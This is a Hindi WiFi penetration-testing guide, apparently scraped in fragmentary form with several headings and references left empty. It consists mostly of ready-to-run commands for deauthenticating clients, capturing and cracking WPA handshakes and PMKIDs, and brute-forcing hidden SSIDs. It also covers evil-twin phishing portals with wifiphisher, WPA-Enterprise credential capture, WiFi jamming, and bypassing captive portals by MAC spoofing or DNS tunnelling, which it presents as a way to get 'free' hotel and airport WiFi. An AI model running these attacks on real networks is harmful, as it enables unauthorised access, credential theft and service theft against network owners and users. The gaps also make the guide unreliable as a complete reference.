
WiFi प्रवेश परीक्षण मार्गदर्शिका
2.1. कैप्टिव पोर्टल
2.2. मैन-इन-द-मिडिल हमला
3.1. कोई क्लाइंट नहीं
4.1. 4-तरफा हैंडशेक क्रैक करना
4.2. PMKID हमला
4.3. AP-रहित हमला
5.1. नकली एक्सेस पॉइंट
5.2. बु्रूट फोर्स
5.3. समर्थित EAP विधियाँ
6.2. OSINT
6.3. वाई-फाई जैमिंग
6.4. अन्य फ्रेमवर्क
7.1. राउटर पर हमला
7.2. स्कैनर्स के प्रकार
7.3. स्पूफिंग
VARIABLE=value
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
मॉनिटर मोड सेट करें
Airodump-ng चलाएं
airodump-ng $IFACE -c $CHANNEL -e $ESSID
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
Airodump-ng का उपयोग करके नेटवर्क सूचीबद्ध करें और AP का MAC पता ($AP_MAC) और क्लाइंट का एक पता ($CLIENT_MAC) प्राप्त करें। कैप्चर को रोकें नहीं।
एक अन्य टर्मिनल में, किसी क्लाइंट या सभी को डिऑथेंटिकेट करें। जब Airodump-ng इस नेटवर्क से हैंडशेक कैप्चर करता है, तो नाम या ESSID पहले टर्मिनल में दिखाई देगा:
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
Airodump-ng का उपयोग करके नेटवर्क सूचीबद्ध करें और AP का MAC पता ($AP_MAC) और क्लाइंट का एक पता ($CLIENT_MAC) प्राप्त करें। कैप्चर को रोकें नहीं।
2.a. एक शब्दकोश हमला निष्पादित करें
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
2.b. या एक ब्रूटफोर्स हमला निष्पादित करें
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
कैरेक्टर सेट के लिए l (लोअरकेस अक्षर), u (अपरकेस अक्षर), n (संख्याएँ), c (लोअरकेस+अपरकेस), m (लोअरकेस+अपरकेस+संख्याएँ) या a (सभी मुद्रित) का उपयोग संभव है।
HTTrack का उपयोग करके एक वेबसाइट क्लोन करें
Wifiphiser इंस्टॉल करें। HTTrack परिणाम को wifiphisher/data/phishing-pages/new_page/html में एक नए फ़ोल्डर में और एक कॉन्फ़िगरेशन फ़ाइल wifiphisher/data/phishing-pages/new_page/config.ini में जोड़ें।
python setup.py install या bin में बाइनरी का उपयोग करके प्रोजेक्ट को पुनः संकलित करें।
hostapd इंस्टॉल करने के बाद यह कमांड नवीनतम Kali रिलीज़ में सही ढंग से काम करता है:
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
कैप्टिव पोर्टल को बायपास करने की पहली विधि है अपने MAC पते को पहले से प्रमाणित उपयोगकर्ता के पते में बदलना।
macchanger
एक कस्टम स्क्रिप्ट जैसे यह(Bash)
साथ ही, आप प्रक्रिया को स्वचालित करने के लिए स्क्रिप्ट का उपयोग कर सकते हैं जैसे:
दूसरी विधि DNS टनल बनाना है। इसके लिए, अपना स्वयं का एक सुलभ DNS सर्वर होना आवश्यक है। आप इस विधि का उपयोग कैप्टिव पोर्टल को बायपास करने और होटल, हवाई अड्डों आदि में 'मुफ्त' वाई-फाई प्राप्त करने के लिए कर सकते हैं।
nslookup example.com
एक 'A रिकॉर्ड': dns.$DOMAIN जो $SERVER_IP की ओर इंगित करता है (उदाहरण: dns.domain.com 139.59.172.117)
एक 'NS रिकॉर्ड': hack.$DOMAIN जो dns.$DOMAIN की ओर इंगित करता है (उदाहरण: hack.domain.com dns.domain.com)
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
यहाँ जांचें कि यह सही ढंग से काम करता है
क्लाइंट में निष्पादन
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
ssh -D 8080 [email protected]
एक बार जब आप नेटवर्क में हों, तो आप परीक्षण कर सकते हैं कि क्या यह मैन-इन-द-मिडिल हमलों के लिए संवेदनशील है।
Ettercap का उपयोग करके ARP स्पूफिंग हमला
Wireshark या TCPdump का उपयोग करके ट्रैफ़िक सूँघें
PCredz (Linux) या Network Miner (Windows) का उपयोग करके ट्रैफ़िक का विश्लेषण करें
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng $PCAP_FILE
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng -w $WORDLIST capture.cap
आप यहाँ से शब्दसूचियाँ प्राप्त कर सकते हैं।
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
आप इस स्क्रिप्ट का उपयोग कर सकते हैं या इन चरणों का पालन कर सकते हैं:
Hcxdumptool और Hcxtool इंस्टॉल करें (आप इस स्क्रिप्ट का उपयोग कर सकते हैं)।
नेटवर्क मैनेजर रोकें
airmon-ng check kill
3a. यदि आप किसी विशिष्ट MAC पते पर हमला करना चाहते हैं
echo $MAC | sed 's/://g' > $FILTER_FILE
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
प्रत्येक पंक्ति की संरचना है: PMKID * राउटर MAC * स्टेशन * ESSID (यहाँ जांचें: https://www.rapidtables.com/convert/number/hex-to-ascii.html)
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
यदि आपके पास वाई-फाई कनेक्शन चालू वाले क्लाइंट डिवाइस तक पहुंच है लेकिन आसपास कोई नेटवर्क नहीं है, तो भी आप उस नेटवर्क पर हमला कर सकते हैं यदि क्लाइंट डिवाइस पहले उससे जुड़ा है।
इसके लिए, आपको इस जैसी कॉन्फ़िगरेशन फ़ाइल के साथ hostpad का उपयोग करके एक नकली एक्सेस पॉइंट बनाना होगा, जिसमें कोई भी पासवर्ड हो लेकिन वही नेटवर्क नाम हो। नकली नेटवर्क बनाएं, क्लाइंट डिवाइस उससे कनेक्ट होने का प्रयास करेगा और आपको इस गाइड के खंड 4.1 की तरह 4-तरफा हैंडशेक मिलता है।
यदि आप वर्चुअल मशीन का उपयोग नहीं करना चाहते हैं, तो आप निम्न का उपयोग करके सब कुछ इंस्टॉल कर सकते हैं:
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
cd WPA_Enterprise_Attack && sudo sh install.sh
एक्सेस पॉइंट प्रारंभ करें इसका उपयोग करके:
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
जब कोई क्लाइंट कनेक्ट होता है, तो लॉग पढ़ें:
sh freeradius_wpe_read.sh
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
समर्थित EAP विधियाँ खोजें
ये दो उन्नत हमले हैं जिन्हें महान Mathy Vanhoef ने खोजा है:
Krack Attack Scripts - इस वेबसाइट पर समझाया गया
Frag Attack Scripts - इस वेबसाइट पर समझाया गया
नकली एक्सेस पॉइंट को छोड़कर सभी उपकरणों को डिऑथेंटिकेट करने का एक उदाहरण:
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC
Linux:
Windows:
एक बार जब आप नेटवर्क से जुड़ जाते हैं
Nmap/Zenmap - सुरक्षा स्कैनर, पोर्ट स्कैनर और नेटवर्क अन्वेषण उपकरण
Masscan - nmap का तेज़ संस्करण (यह चीजों को तोड़ सकता है, इसलिए सावधान रहें)
Netdiscover - ARP सूँघना। यदि नेटवर्क बहुत अच्छी तरह से खंडित हैं तो बहुत उपयोगी
| ऑपरेटिंग सिस्टम | प्लेटफॉर्म | क्रेडेंशियल्स | आकार | लिंक |
|---|
| Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3.25 GB | MEGA |
| Kali 2019.1 | VMware | root:wifi | 4.99 GB | MEGA |
| Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | MEGA |
| Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5.56 GB | MEGA |